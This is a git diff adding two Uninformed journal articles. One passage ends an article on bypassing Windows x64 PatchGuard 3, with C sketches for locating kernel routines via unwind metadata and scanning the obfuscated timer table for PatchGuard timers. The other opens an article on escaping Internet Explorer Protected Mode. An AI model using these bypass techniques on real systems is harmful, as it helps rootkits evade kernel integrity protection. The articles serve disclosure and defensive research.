parameters in the exception record), and somewhere in the call stack +the kernel routine responsible for dispatching DPCs or timer DPCs is going to +be present. + +By combining these facts, it is possible to make a highly accurate +determination as to whether an exception is caused by PatchGuard. The latter +piece of information (checking whether the routine responsible for calling the +DPC or timer DPC is in the call stack) also proves valuable when one must +later counteract the second defense added to the SEH code path, that is, the +randomization of the call stack. + +In order to determine whether the DPC or timer DPC dispatcher is in a given +call stack, it is first necessary to locate it in the kernel image. There are +some complications here. 
First of all, the timer DPC dispatcher routine has
three call instructions that can call a timer DPC, not all of which are
readily triggerable. Additionally, neither the timer DPC dispatcher nor the
DPC dispatcher is exported.

However, while it is not possible to simply ask for the addresses of those two
routines, it is possible to find them programmatically by requesting that a
DPC and a timer DPC be executed through the documented APIs for DPCs and timer
DPCs. From within the DPC or timer DPC routine, it is then possible to locate
the return address via the use of the _ReturnAddress() compiler intrinsic.
This works because the return address will be guaranteed to reside within the
DPC or timer DPC dispatcher. Alternatively, an assembly language routine
could be written that simply examines the current pointer at [rsp] at the time
of the call.

This still leaves a problem in the timer DPC dispatcher case, as there are
three call instructions, and it is not easy to observe calls from all three
call sites within the timer DPC dispatcher on-demand, since it is necessary to
programmatically find the return points at runtime. However, once again, the
very same metadata that is critical to x64 SEH support dooms PatchGuard with
respect to this approach, as it is possible to go from an arbitrary
instruction in the middle of any function to the start of that function by
following chained unwind metadata until an unwind metadata block is reached
that has no parent [4]. This top-level unwind metadata block has a reference
to the first instruction in the function. Now that it is possible to locate
the start of a function from any arbitrary valid instruction location within
that function, it becomes trivial to determine if two addresses reside in the
same function; to do this, one must only follow the unwind metadata chain for
both addresses, and then check to see whether both top-level unwind metadata
blocks refer to the same function. With this technique, combined with the
ability to locate at least one call site within the timer DPC dispatcher, it
again becomes possible to identify the timer DPC dispatcher, as no matter
which call site is used, it will be guaranteed that the call site resides
within the timer DPC dispatcher routine KiTimerExpiration. By comparing
top-level unwind metadata blocks, it becomes possible to authoritatively
discern whether any arbitrary instruction resides within the timer DPC
dispatcher or not.

It is also possible to bypass the alterations to the exception (and
instruction pointer) addresses that KiCustomAccessHandler (the
assembly-language "first chance" exception handler routines for the repurposed
DPC routines) makes by performing a stack trace from _C_specific_handler
itself instead of relying on the context record or exception handler
information. This is because the call stack is conveyed as if the faulting
instruction in the repurposed DPC call stack was the site of a call to
KiGeneralProtectionFault. As a result, it is possible to substitute the
current context for the context presented to _C_specific_handler for unwind
purposes. This also provides a layer of defense against Microsoft altering
other registers in the exception handler context in future PatchGuard
revisions, which could cause manual unwinds to return incorrect register
values, resulting in system crashes after an unwind intended to effect a hard
return out of the re-purposed DPC routine.
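
As a rough sketch of the metadata walk just described (and not the code from
the implementation included with this article), the following routine resolves
an arbitrary code address to the begin address of its top-level enclosing
function by following chained unwind information. The structure layout is the
documented x64 one; the type and helper names are assumptions made for the
sake of illustration. With such a helper, testing whether two addresses lie
in the same routine (for example, whether a return address lies within
KiTimerExpiration) reduces to comparing the two resolved begin addresses.

#include <ntddk.h>

#define UNW_FLAG_CHAININFO 0x4

//
// Documented layout of the x64 unwind information header; when the chain
// flag is set, the parent RUNTIME_FUNCTION follows the (even-padded) unwind
// code array.
//
typedef struct _PGP_UNWIND_INFO {
    UCHAR  Version       : 3;
    UCHAR  Flags         : 5;
    UCHAR  SizeOfProlog;
    UCHAR  CountOfCodes;
    UCHAR  FrameRegister : 4;
    UCHAR  FrameOffset   : 4;
    USHORT UnwindCode[ 1 ];
} PGP_UNWIND_INFO, *PPGP_UNWIND_INFO;

//
// Resolve an instruction address to the first instruction of its top-level
// (non-chained) enclosing function, or 0 if no unwind metadata is found.
//
static ULONG64 PgpFunctionStart(ULONG64 Address)
{
    ULONG64           ImageBase;
    PRUNTIME_FUNCTION Function;
    PPGP_UNWIND_INFO  Unwind;

    for (;;) {
        Function = RtlLookupFunctionEntry(Address, &ImageBase, NULL);

        if (Function == NULL)
            return 0;

        Unwind = (PPGP_UNWIND_INFO)(ImageBase + Function->UnwindData);

        if ((Unwind->Flags & UNW_FLAG_CHAININFO) == 0)
            break;

        //
        // Chained entry: the parent RUNTIME_FUNCTION follows the unwind
        // code array.  Re-resolve from the parent's begin address.
        //
        Function = (PRUNTIME_FUNCTION)&Unwind->UnwindCode[
            (Unwind->CountOfCodes + 1) & ~1 ];
        Address  = ImageBase + Function->BeginAddress;
    }

    return ImageBase + Function->BeginAddress;
}
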

Furthermore, by clever usage of this mechanism for determining whether an
address resides within a particular function, it is also now possible to
determine the real return address for any given re-purposed DPC routine.
Specifically, by checking whether each address in the call stack as of
_C_specific_handler is within either the DPC dispatcher or the timer DPC
dispatcher, one can determine whether a given call frame corresponds to the
call site that called the re-purposed DPC routine or not, irrespective of any
random amount of bogus function calls that may be layered on top of the
re-purposed DPC. This in turn defeats the remaining improvement to the SEH
PatchGuard code path, as it once again becomes possible to cleanly unwind from
any arbitrary point in the PatchGuard exception callstack.

Through the combination of the ability to either circumvent entirely or "see
through" the deception that KiCustomAccessHandler creates over the exception
information passed to _C_specific_handler, and the ability to recover the
correct return address of a repurposed DPC routine, it now becomes possible to
disable the SEH control flow path of PatchGuard 3. This leaves the remaining
problem of locating the non-SEH control flow path of PatchGuard in non-paged
pool memory as the last piece of the puzzle with respect to this method of
disabling PatchGuard. However, locating the trampoline routine that adapts a
DPC routine call to a PatchGuard stage 1 decryption stub call is trivial, as
the adapter trampoline is static and contains a very recognizable signature in
terms of the constants written to the beginning of the decryption stub. In
order to disable the trampoline routine, it is enough to simply patch it with
a "ret" instruction (effectively the same thing as the SEH bypass technique,
but as implemented in code instead of a virtual unwind).

The source code to a working implementation of the hybrid exception
interception and memory searching bypass technique for PatchGuard 3 is
included with the article.

Although this approach is successful in disabling the current iteration of
PatchGuard 3, it is not without its weaknesses. Microsoft could, for
instance, disable this technique via altering the SEH-less PatchGuard
DPC-to-decryption-stub adapter to not be static (i.e. randomization of the
code placed into non-paged pool at runtime). There are also a number of
assumptions of the SEH-based approach that could be invalidated by Microsoft
in a future PatchGuard release. However, in keeping with the fact that it is
possible to gain control flow at a lower level than the exception dispatcher
path itself (i.e. patching KiGeneralProtectionFault), the author feels that it
would be better to focus on removing relevant information before any exception
handlers (assembler or C-language) are called instead of after the defining
moment (in other words, the exception) occurs, as it is the exception that
presents the first easily-accessible interception point to an outside
attacker.

4.2) Timer DPC Dispatcher and DPC Dispatching

Although PatchGuard 3 eliminates SEH as a single point of failure with respect
to executing the system integrity checks, the timer and DPC dispatchers
continue to remain attractive targets. One simple bypass mechanism is to
locate the call sites in both routines (such as by recording the addresses of
both dispatcher routines as described in bypass technique 1, and then
performing disassembly to locate and patch all call sites).
At each call site,
it is possible to detect that PatchGuard is being executed by looking for
either a non-canonical DeferredContext parameter value or a DeferredRoutine
that resides within the non-paged pool. (In PatchGuard 3, implementing the
former check alone proves sufficient, as, for the ease of implementation of
PatchGuard 3, both the repurposed DPC routines and the non-SEH-based control
path use compatible calling conventions, which stipulate a non-canonical
obfuscated pointer value as the DeferredContext parameter.)

The main disadvantage of this approach involves the inherent difficulties in
performing arbitrary code patching on x64 (specifically, the large size of any
code patch and the large number of now relatively common
instruction-pointer-relative instructions). However, given that this is a
difficulty that impacts any code patching on x64, the author feels that it
should not be considered a significant problem for a determined attacker. In
fact, Microsoft Research's very own Detours implements a code patching system
for x64 [5], illustrating that code patching on x64 in general is not a task
that should be considered insurmountable by any means.

Because the timer and DPC dispatchers remain relatively unprotected targets
that have not been involved in public bypass source code that has been
released to date, the author would recommend bolstering the defenses of the
timer and DPC dispatchers for the next PatchGuard release, as the two routines
continue to represent an attractive single point of failure. Adding a third
PatchGuard execution mechanism that does not involve traditional DPCs at all
would be an example of one approach to eliminate the DPC dispatcher related
logic as a single point of failure. It may also be possible to increase the
difficulty of locating all of the call sites within the DPC dispatching
related code through a combination of differing static call stacks for each of
the three call sites of the timer DPC dispatcher (i.e. adding dummy function
calls) and call stack randomization layered on top of those static
differences. Randomized call stacks alone would not suffice, as by examining
the call stacks of many iterations of timer DPC requests, it would become easy
to eliminate the randomized entries (which would not be common to all recorded
call stacks) with a relatively high degree of accuracy given a large sample
size. A disadvantage to taking such an approach is that it would essentially
result in adding deliberately-difficult-to-maintain "spaghetti code" into yet
another critical area of the operating system (the timer DPC dispatcher
logic). The author suspects that the maintainer of the timer DPC dispatcher
code would likely not appreciate having to deal with such things.

4.3) Canceling the PatchGuard Timer(s)

As PatchGuard continues to rely upon timer DPCs for the execution of its check
routines, the kernel timer DPC list itself continues to remain a relatively
attractive target for attack. The timer DPC list is common to all control
paths leading to PatchGuard, as timers are always used for the delayed
execution component that periodically calls the check routine.

There are presently two obstacles in the way of attacking the timer DPC list.
The first is that altering it relies upon locating non-exported kernel
variables.
Although it may be possible to do so via fingerprinting, this does
make the approach slightly less desirable than it might initially appear.
However, fingerprinting can work if done carefully, and there are many short
functions that reference the timer list in a fairly predictable fashion (e.g.
KeCancelTimer). One other possible way to find the timer list would be to
create and set a timer (thus inserting it into the timer list), and then scan
every 8-byte-aligned value in a non-paged uninitialized data section in
ntoskrnl, treating each valid address as a linked list and searching the first
several entries for the timer that was just linked into the list. While a
rather ugly and bruteforce-based approach (and not entirely safe either, as
one would need to be relying heavily on MmIsAddressValid), scanning the
ntoskrnl data sections is one alternative to fingerprinting in terms of
finding the timer list.

The second problem with this approach is that, starting with PatchGuard 2,
the timer list itself is obfuscated such that the link between a KTIMER object
and its corresponding KDPC is obfuscated. This obfuscation mechanism, as
previously described in the section on timer list obfuscation, hinges upon two
additional non-exported kernel variables (KiWaitAlways, KiWaitNever) that act
as obfuscation keys. Locating these variables would likely entail code
analysis or fingerprinting of (possibly exported) routines that need to insert
a timer into the timer list, such as KeSetTimerEx.

Another alternative approach that dispenses with fingerprinting and/or
bruteforce-based approaches altogether, at the expense of requiring added
complexity (a user mode component), would be to postpone the activation of any
driver code that would run afoul of PatchGuard until after Win32 in user mode
has been started. A user mode service could then be created that would
download the symbols for the kernel binary in use, retrieve the addresses of
KiTimerTableListHead (the timer list), KiWaitNever, and KiWaitAlways, and pass
these addresses on to the driver via any standard user mode to kernel mode
communication mechanism (such as DeviceIoControl). Because the kernel
debugger relies on the ability to retrieve these variables by name via the PDB
symbols for the !kdexts.timer extension, Microsoft would not be able to block
this approach by removing or renaming the obfuscation key variables without
impairing the functionality of existing debugger binaries.

Once one has located KiTimerTableListHead, KiWaitAlways, and KiWaitNever, it
is a fairly simple matter (if perhaps unsafe without synchronization, though
one could always take the "sledgehammer" approach and stop all but one CPU and
raise IRQL to HIGH_LEVEL) to traverse the timer list, deobfuscate the DPC link
on each corresponding timer object, and from there check each timer to see
whether it bears the characteristics of being a PatchGuard timer (which may
include attributes like a timer interval several minutes into the future, a
non-canonical DeferredContext value, and possibly a DPC routine pointer into
non-paged pool). After one has located the timer in question, it can be
easily disabled (either by removing it from the list entirely, such as via
KeCancelTimer, or by rewriting the DPC routine to point to an empty function
that simply returns without performing any operation).
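
A sketch of what such a sweep might look like is shown below. It assumes that
the three variable addresses have already been provided by the user mode
component described above, that the timer table bucket layout and bucket count
match the target kernel build, and that the WDK KTIMER/KDPC definitions match
the running kernel; the helper names and the table-size constant are
illustrative assumptions, and all synchronization, IRQL, and pointer
validation concerns (for example, MmIsAddressValid on the decoded DPC pointer)
are deliberately omitted.

#include <ntddk.h>

//
// Layout of a timer table bucket; assumed to match the target build
// (Vista-era kernels keep a per-bucket expiration time next to the list
// head).  The bucket count is likewise an assumption.
//
typedef struct _PGP_TIMER_TABLE_ENTRY {
    LIST_ENTRY     Entry;
    ULARGE_INTEGER Time;
} PGP_TIMER_TABLE_ENTRY, *PPGP_TIMER_TABLE_ENTRY;

#define PGP_TIMER_TABLE_SIZE 256

//
// Addresses resolved from PDB symbols in user mode and handed to the driver
// (for example, via DeviceIoControl).
//
static PPGP_TIMER_TABLE_ENTRY PgpKiTimerTableListHead;
static ULONG64                PgpKiWaitNever;
static ULONG64                PgpKiWaitAlways;

//
// Decode a KTIMER's obfuscated Dpc link using the algorithm shown in the
// timer list obfuscation section.
//
static PKDPC PgpDecodeTimerDpc(PKTIMER Timer)
{
    ULONG64 Value = (ULONG64)Timer->Dpc;

    Value ^= PgpKiWaitNever;
    Value  = _rotl64(Value, (UCHAR)PgpKiWaitNever);
    Value ^= (ULONG64)Timer;
    Value  = _byteswap_uint64(Value);
    Value ^= PgpKiWaitAlways;

    return (PKDPC)Value;
}

//
// Walk every timer table bucket and flag timers whose decoded DPC carries a
// non-canonical DeferredContext value (one of the PatchGuard characteristics
// noted above).
//
static VOID PgpScanTimerTable(VOID)
{
    ULONG Bucket;

    for (Bucket = 0; Bucket < PGP_TIMER_TABLE_SIZE; Bucket += 1) {
        PLIST_ENTRY Head = &PgpKiTimerTableListHead[ Bucket ].Entry;
        PLIST_ENTRY Next;

        for (Next = Head->Flink; Next != Head; Next = Next->Flink) {
            PKTIMER Timer = CONTAINING_RECORD(Next, KTIMER, TimerListEntry);
            PKDPC   Dpc   = PgpDecodeTimerDpc(Timer);
            ULONG64 Ctx   = (ULONG64)Dpc->DeferredContext;

            //
            // Canonical x64 addresses sign-extend bit 47; anything falling
            // in the gap between the user and kernel halves is suspect.
            //
            if (Ctx >= 0x0000800000000000ULL &&
                Ctx <  0xFFFF800000000000ULL) {
                //
                // Candidate PatchGuard timer: cancel it (KeCancelTimer) or
                // repoint its DeferredRoutine at a benign stub.
                //
            }
        }
    }
}
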

Because Microsoft has functionality in the debugger that depends on the
ability to use these variables to access the timer list, they have
unfortunately backed themselves into something of a corner with respect to
current operating system versions, as it is generally Microsoft's policy that
existing debugger binaries continue to function properly after hotfixes or
service packs to a particular already-released operating system version. The
best ways to counteract this approach would be to make it more difficult to
pick out the PatchGuard DPC in-memory with respect to all of the other timer
DPC objects that are in the list at any given time for a typical system, and
to create additional launch vectors for PatchGuard that do not depend so
heavily on the timer list. There exist a number of other ways to execute code
without drawing the attention of someone that does not know what they are
looking for, many of which are less obvious than a timer.

4.4) Page-Table Swap

Like all memory accesses in the Windows kernel, PatchGuard's system integrity
check routine operates in protected mode with paging enabled. It may
theoretically be possible to take advantage of this fact to hide kernel
patches from PatchGuard.

The proposed bypass technique would involve patching the first instruction in
the timer and DPC dispatchers to branch to third party code. When DPCs and
timer DPCs are about to be considered for execution, as signaled by a call to
one of the two dispatcher routines, a shadow copy of the page tables is
created. This shadow copy is configured to be identical to the normal page
table for the current process, except that the page table entries for any
kernel code pages that have been patched are altered to refer to physical
pages that are representative of the original state. The return address of
the DPC or timer DPC dispatcher on the stack is swapped with a pointer into
driver-supplied code, and cr3 is reconfigured to point to the shadow page
table. Then, execution is transferred back to the timer or DPC dispatcher
entrypoint (which no longer shows any signs of patching due to the page table
swap), and DPCs are dispatched. When the dispatcher is finished with its
work, which would include invoking PatchGuard if PatchGuard is to be executed
in any batched timer DPCs, control is returned to driver-supplied code, which
then mirrors any page table modifications made since the shadow copy was
created back to the actual page table for the process, and cr3 is returned to
its original value. Control is then transferred to the normal return point of
the dispatcher.

This approach does not involve disabling PatchGuard at all. Instead, it
describes a potential way to "peacefully coexist" with it, so long as only
kernel code patches are being made. (Data pages, which could be expected to
be modified by a DPC, are considered by the author to be much less practical
to protect from PatchGuard in this fashion.) Because the DPC and timer DPC
dispatcher logic executes at IRQL DISPATCH_LEVEL, thread context switching is
disabled for the current processor, making the cr3 swap approach relatively
feasible.

Because this approach does not involve attacking PatchGuard directly, it
automatically circumvents all of the myriad defensive mechanisms built into
PatchGuard in current releases, making it a fairly attractive potential avenue
of attack. However, there are some downsides.
Among other things, the
synchronization required to pull a page table swap off in a multiprocessor
environment is likely to be complex and difficult to duplicate safely if one
allows DPC routines to perform operations that alter PTEs. Additionally,
there would be a performance impact incurred by this approach, as it would
need to run continuously in a relatively high-impact path (DPC dispatching)
throughout system lifetime. The performance implications of invalidating TLBs
on every DPC batch may be problematic in some circumstances (swapping cr3
automatically clears out TLBs).

Another disadvantage of this approach is that, by virtue of the fact that all
DPCs (and potentially all device hardware interrupts) may run with the shadow
copy of the page table, most hardware-related events will not be subject to
kernel code patches hidden by this mechanism. This may or may not be a
problem depending on what the goal of the desired kernel patching is.

Microsoft could counteract this approach by making a copy of all PTEs that
describe the kernel at PatchGuard initialization time, and then validating all
kernel code PTEs from within the PatchGuard check routine. Additionally, if
Microsoft could make the assumption that PatchGuard always executes in the
system process, another approach could be to require that cr3 take on a known
value.

4.5) DPC Exception Handler Patching

One of the changes introduced in PatchGuard 3 over PatchGuard 2 was a slight
change to the protocol used to invoke the first stage of the decryption
process. Specifically, all callers of an encrypted PatchGuard context now
include a static 8-byte string (of instruction opcodes) that is xor'd with a
value at the start of the PatchGuard context to form the initial decryption
key.

The reasons for making this change over the original behavior are unclear to
the author, but it unfortunately represents an easy target for disabling
PatchGuard, as the string itself (0x8513148113148F0) is fairly unique and
unlikely to appear outside of PatchGuard in terms of kernel code.
Furthermore, all PatchGuard callers, including all ten of the repurposed DPC
routine exception handlers and the non-paged pool memory DPC adapter (if
used), reference the string with no obfuscation to speak of. This presents an
extremely easy, fingerprint-based approach to disabling PatchGuard. By
scanning non-paged pool space for this string, as well as kernel code regions,
it is trivially easy to locate an instruction in the middle of every single
code path responsible for invoking PatchGuard's check context.

After the instructions referencing the 8-byte string have been located, it is
trivial to patch them to execute an unwind out of the exception handler logic
(or, in the case of the non-paged pool memory code, simply return directly).
Such an attack prevents PatchGuard from ever starting, and furthermore has the
advantage of requiring a minimum of additional supporting logic (when compared
to many of the other bypass techniques outlined in this article).

It would be trivial for Microsoft to disable this technique. The
recommendation of the author would be to get rid of the static 8-byte string
referenced in every PatchGuard caller. Ironically, PatchGuard 2 necessarily
has a similar 4-byte string (which is also still used in PatchGuard 3),
representing the initial instruction of the first stage decryption stub.

Unlike PatchGuard 3, however, PatchGuard 2 takes care to obfuscate the process
of writing the opcode string out to the PatchGuard context, so that one cannot
simply use a single blanket fingerprint to cover all cases. The change made
in PatchGuard 3 completely blows this work out of the water, so to speak, and
the 8-byte string has the added advantage (from an attacker's perspective) of
being twice as large a value to fingerprint as well.

4.6) System Call MSR Swap

As a variation on the technique described in the page-table swap section
above, it should theoretically be possible to swap the system call MSRs (or in
fact several other processor control registers that are protected by
PatchGuard) for the duration of DPC or timer DPC dispatching, with the
"tainted" values being restored after the dispatcher returns. The system call
MSRs are responsible for designating the address of the system call
dispatcher, and are thus an attractive target for third parties that would
like to perform system call hooking.

The same basic concepts would be applied to this technique as previously
described in the cr3 swap technique. If system calls are the only desired
targets to hook, then the cr3 swap can be eliminated as unnecessary for single
processor systems (as it would be safe to make and restore changes to the
actual underlying physical pages before and after a DPC dispatcher call, using
the return address on the stack as a way to return to the altered location
without leaving opcodes patched in the kernel across dispatcher invocations).
For multi-processor systems, some mechanism would need to be developed to
allow the MSR swap to be made across DPC dispatchers while preventing code
patches from becoming visible to a second processor. This is necessary
because there could be more than one PatchGuard context executing
simultaneously, given the PatchGuard 3 addition of a probability to initialize
a second check context at system boot time.

In order to block such a technique, Microsoft would likely be best served by
making it difficult to locate all of the regions that must be patched in order
to maintain the deception of an unpatched system across PatchGuard checks.
The principal way to do this would be to create other, alternative launch
vectors for PatchGuard that are unrelated to DPCs and, preferably, do not
involve exported APIs that are easy to intercept from a third party
perspective.

5) Conclusion

Although PatchGuard 3 does bring some pointed counter-attacks to many
previously disclosed bypass techniques, version 3, like its predecessors, is
hardly immune to being either disabled completely or simply co-existed with.
It is likely that future revisions to PatchGuard will continue to be
vulnerable to a variety of bypass techniques, though it is certainly within
Microsoft's reach to counter many of the publicly disclosed bypass vectors.
It is anticipated by the author that until PatchGuard can be implemented with
hardware support, such as via a combination of trusted boot (TPM) and a
permanent hypervisor, future revisions will continue to be vulnerable to
attack from determined individuals.

On the other hand, Microsoft's efforts with PatchGuard appear to have paid off
so far in terms of preventing a mass uptake of PatchGuard-violating drivers on
Windows x64. In other words, a case could be made that Microsoft doesn't need
to be perfect with PatchGuard, only "good enough" to give vendors cold feet
about trying to ship products that bypass it.
Only time will tell if this +continues to remain the case into the future, however. + +References + +[1] Skywing. Subverting PatchGuard version 2. + http://www.uninformed.org/?v=6&a=1&t=sumry; accessed September 16, 2007 + +[2] Skywing. Programming against the x64 exception handling support, part 7: Putting it all together, or building a stack walking routine. + http://www.nynaeve.net/?p=113; accessed September 16, 2007 + +[3] skape. Improved Automated Analysis of Windows x64 Binaries. + http://uninformed.org/index.cgi?v=4&a=1&t=sumry; accessed September 16, 2007 + +[4] skape, Skywing. Bypassing PatchGuard on Windows x64. + http://uninformed.org/index.cgi?v=3&a=3&t=sumry; accessed September 16, 2007 + +[5] Microsoft. Detours. + http://research.microsoft.com/sn/detours/; accessed September 16, 2007 diff --git a/uninformed/8.3.txt b/uninformed/8.3.txt new file mode 100644 index 0000000..fabcbdf --- /dev/null +++ b/uninformed/8.3.txt @@ -0,0 +1,362 @@ +Getting out of Jail: Escaping Internet Explorer Protected Mode +September, 2007 +Skywing +Skywing@valhallalegends.com +http://www.nynaeve.net + +Abstract: With the introduction of Windows Vista, Microsoft has added a new +form of mandatory access control to the core operating system. Internally +known as "integrity levels", this new addition to the security manager allows +security controls to be placed on a per-process basis. This is different from +the traditional model of per-user security controls used in all prior versions +of Windows NT. In this manner, integrity levels are essentially a bolt-on to +the existing Windows NT security architecture. While the idea is +theoretically sound, there does exist a great possibility for implementation +errors with respect to how integrity levels work in practice. Integrity +levels are the core of Internet Explorer Protected Mode, a new "low-rights" +mode where Internet Explorer runs without permission to modify most files or +registry keys. This places both Internet Explorer and integrity levels as a +whole at the forefront of the computer security battle with respect to Windows +Vista. + +1) Introduction + +Internet Explorer Protected Mode is a reduced-rights operational mode of +Internet Explorer where the security manager itself enforces a policy of not +allowing write access to most file system, registry, and other securable +objects by default. This mode does provide special sandbox file system and +registry space that is permitted to be written to by Internet Explorer when +operating in Protected Mode. + +While there exist some fundamental shortcomings of Protected Mode as it is +currently implemented, such as an inability to protect user data from being +read by a compromised browser process, it has been thought to be effective at +blocking most write access to the system from a compromised browser. The +benefit of this is that if one is using Internet Explorer and a buffer overrun +occurs within IExplore.exe, the persistent impact should be lessened. For +example, instead of having write access to everything accessible to the user's +account, exploit code would instead be limited to being able to write to the +low integrity section of the registry and the low integrity temporary files +directories. This greatly impacts the ability of malware to persist itself or +compromise a computer beyond just IExplore.exe without some sort of user +interaction (such as persuading a user to launch a program from an untrusted +location with full rights, or other social engineering attacks). 
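+
+To make the low integrity sandbox less abstract, the following sketch
+launches an arbitrary program at low integrity using only the documented
+token APIs; this is roughly the condition IExplore.exe runs under in
+Protected Mode. The code is illustrative and is not taken from the sample
+program accompanying this article; error handling is omitted and the command
+line shown is just an example.
+
+#include <windows.h>
+#include <sddl.h>
+
+/*
+ * Launch a program with a low integrity token (S-1-16-4096). Error
+ * handling and cleanup are omitted for brevity.
+ */
+int wmain(void)
+{
+    HANDLE hToken, hNewToken;
+    PSID pLowSid;
+    TOKEN_MANDATORY_LABEL tml = { 0 };
+    STARTUPINFOW si = { sizeof(si) };
+    PROCESS_INFORMATION pi;
+    WCHAR cmd[] = L"C:\\Windows\\System32\\cmd.exe";
+
+    OpenProcessToken(GetCurrentProcess(),
+                     TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT |
+                     TOKEN_ASSIGN_PRIMARY, &hToken);
+    DuplicateTokenEx(hToken, 0, NULL, SecurityImpersonation, TokenPrimary,
+                     &hNewToken);
+
+    /* S-1-16-4096 is the low mandatory level SID. */
+    ConvertStringSidToSidW(L"S-1-16-4096", &pLowSid);
+    tml.Label.Attributes = SE_GROUP_INTEGRITY;
+    tml.Label.Sid        = pLowSid;
+    SetTokenInformation(hNewToken, TokenIntegrityLevel, &tml,
+                        sizeof(tml) + GetLengthSid(pLowSid));
+
+    /* The new process runs with the lowered integrity level. */
+    CreateProcessAsUserW(hNewToken, NULL, cmd, NULL, NULL, FALSE, 0, NULL,
+                         NULL, &si, &pi);
+    return 0;
+}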
+ +2) Protected Mode and Integrity Levels + +Internally, Protected Mode is implemented by running IExplore.exe as a low +integrity process. With the default security descriptor that is applied to +most securable objects, low integrity processes may not generally request +access rights that map to GENERIC_WRITE for a particular object. As Internet +Explorer does need to be able to persist some files and settings, exceptions +can (and are) carved out for low integrity processes in the form of registry +keys and directories with special security descriptors that grant the ability +for low integrity processes to request write access. Because the IExplore +process cannot write files to a location that would be automatically used +by a higher integrity process, and it cannot request dangerous access +rights to other running processes (such as the ability to inject code via +requesting PROCESS_VM_WRITE or the like), malware that runs in the context of +a compromised IExplore process is (theoretically) fairly contained from the +rest of the system. + +However, this containment only holds as long as the system happens to be free +of implementation errors. Alas, but perhaps not unexpectedly, there are in +fact implementation problems in the way the system manages processes running +at differing integrity levels that can be leveraged to break out of the +Protected Mode (or low integrity) jail. To understand these implementation +errors, it is first necessary to gain a basic working understanding of how the +new integrity-based security model works in Windows. The integrity model is +key to a number of Windows Vista features, including UAC (User Account +Control). + +When a user logs on to a computer in Windows Vista with UAC enabled, their +shell is normally started as a ``medium'' integrity process. Integrity levels +are integers and symbolic designations such as ``low'', ``medium'', ``high'', +or ``system'' are simply used to indicate certain well-known intermediate +values). Medium integrity is the default integrity level even for built-in +administrators (except the default ``Administrator'' account, which is a +special case and is exempted from UAC). Most day to day activity is intended +to be performed at medium integrity; for instance, a word processor program +would be expected to operate at medium integrity, and (theoretically) games +would generally run at medium integrity as well. Games tend to be rather +poorly written in terms of awareness of the security system, however, so this +tends to not really be the case, at least not without added help from the +operating system. Medium integrity roughly corresponds to the environment +that a limited user would run as under previous versions of Windows. That is +to say, the user has read and write access to their own user profile and their +own registry hive, but not write access to the system as a whole. + +Now, when a user launches Internet Explorer, an IExplore.exe process is +launched as low integrity. The default security descriptor for most objects +on Windows prevents low integrity processes from gaining write access to +medium integrity securable objects, as previously mentioned. In reality, the +default security descriptor denies write access to higher integrities, not +just to medium integrity, though in this case the effect is similar in terms +of Internet Explorer. As a result, the IExplore.exe process cannot write +directly to most locations on the system. 
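+
+For reference, a process can inspect its own integrity level with the
+documented token information APIs. The short sketch below is illustrative
+only; it prints the integrity RID of the current process, where 0x1000,
+0x2000, and 0x3000 are the well-known low, medium, and high values referred
+to later in this article.
+
+#include <windows.h>
+#include <stdio.h>
+
+/*
+ * Print the integrity level RID of the current process (0x1000 = low,
+ * 0x2000 = medium, 0x3000 = high). Error handling is omitted.
+ */
+int wmain(void)
+{
+    HANDLE hToken;
+    BYTE buf[128];
+    DWORD cb = sizeof(buf);
+    TOKEN_MANDATORY_LABEL *ptml = (TOKEN_MANDATORY_LABEL *)buf;
+    DWORD rid;
+
+    OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
+    GetTokenInformation(hToken, TokenIntegrityLevel, ptml, cb, &cb);
+
+    /* The last subauthority of the label SID is the integrity RID. */
+    rid = *GetSidSubAuthority(ptml->Label.Sid,
+                              *GetSidSubAuthorityCount(ptml->Label.Sid) - 1);
+    wprintf(L"Integrity level: 0x%04lx\n", rid);
+    return 0;
+}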
+
+However, Internet Explorer does, in certain cases, need to gain write access
+to locations outside of the low integrity (Protected Mode) sandbox. For this
+task, Internet Explorer relies on a helper process, known as ieuser.exe, which
+runs at medium integrity level. There is a tightly controlled RPC interface
+between ieuser.exe and IExplore.exe that allows Internet Explorer, running at
+low integrity, to request that ieuser.exe display a dialog box asking the user
+to, say, choose a save location for a file and then save said file to disk.
+This is the mechanism by which one can save files in their home directory even
+under Protected Mode. Because the RPC interface only allows IExplore.exe
+to request that a file be saved, a program cannot
+directly abuse the RPC interface to write to arbitrary locations, at least not
+without user interaction.
+
+Part of the reason why the RPC interface cannot be trivially abused is that
+there also exists some protection baked into the window manager that prevents
+a thread at a lower integrity level from sending certain, potentially
+dangerous, messages to threads at a higher integrity level. This allows
+ieuser.exe to safely display user interface on the same desktop as the
+IExplore.exe process without malicious code in the Internet Explorer process
+simply being able to simulate fake keystrokes in order to cause it to save a
+dangerous file to a dangerous location without user interaction.
+
+Most programs that are integrity-level aware operate with the same sort of
+paradigm that Internet Explorer does. In such programs, there is typically a
+higher integrity broker process that provides a tightly controlled interface
+to request that certain actions be taken, with the consent of the user. For
+example, UAC has a broker process (a privileged service) that is responsible
+for displaying the consent user interface when the user tries to perform an
+administrative task. This operates similarly in principle to how Internet
+Explorer can provide a security barrier through Protected Mode because the
+lower privileged process (the user program) cannot magically elevate itself
+to full administrative rights in the UAC case (which runs a program at high
+integrity level, as opposed to the default medium integrity level).
+Instead, it could only ask the service to display the consent UI, which is
+protected from interference by the program requesting elevation due to the
+window manager restrictions on sending dangerous messages to a higher
+integrity level window.
+
+3) Breaking the Broker
+
+If one has been using Windows Vista for some time, none of the behavior that
+has just been described should come across as new. However, there are some
+cases that have not yet been discussed which one might have observed from time
+to time with Windows Vista. For example, although programs are typically
+restricted from being able to synthesize input across integrity levels, there
+are some limited circumstances where this is permitted. One easy to see
+instance of this is the on-screen keyboard program (osk.exe) which, despite
+running without a UAC prompt, can generate keyboard input messages that are
+transmitted to other processes, even elevated administrative processes. This
+would at first appear to be a break in the security system; questions along
+the lines of "If one program can magically send keystrokes to higher integrity
+processes, why can't another?" come to mind. 
